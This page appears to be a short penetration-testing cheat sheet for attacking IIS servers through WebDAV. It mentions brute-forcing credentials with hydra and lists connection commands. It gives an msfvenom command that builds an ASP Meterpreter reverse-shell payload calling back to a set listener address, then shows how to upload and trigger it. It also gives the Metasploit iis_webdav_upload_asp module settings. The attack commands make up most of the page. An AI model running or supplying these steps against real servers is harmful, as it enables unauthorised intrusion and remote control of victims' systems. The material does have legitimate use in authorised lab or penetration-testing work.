iis-windows-abuse

Brute force credentials with hydra.

Connection (testing WebDAV)

devtest -auth bob:password -url http://"$ip"/dir
cadaver http://"$ip"/<dir>

Exploit (2 ways)

Manual method

Generate .asp payload with msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.26.3 lport=8080 --platform windows -f asp > shell.asp

Connect to WebDAV server

cadaver http://"$ip"/webdav
Put the payload to the webserver

Start metasploit-framework

Start msfconsole, set options and run (same as while generating payloads)

Open shell.asp from the browser

Automate method (MSF)

Start msfconsole with PostgreSQL

sudo service postgresql start && msfconsole

Set options

Use exploit/windows/iis/iis_webdav_upload_asp
set httppassword <password>
Set httpusername <username>
Set path /webdav/meterpreter_session.asp
Set rhosts <ip_address>
run

Previousiis-tilde Nextiis-windows

Last updated 1 day ago

hashtagBrute force credentials with hydra.

hashtagExploit (2 ways)

hashtagManual method

hashtagAutomate method (MSF)

Brute force credentials with hydra.

Exploit (2 ways)

Manual method

Automate method (MSF)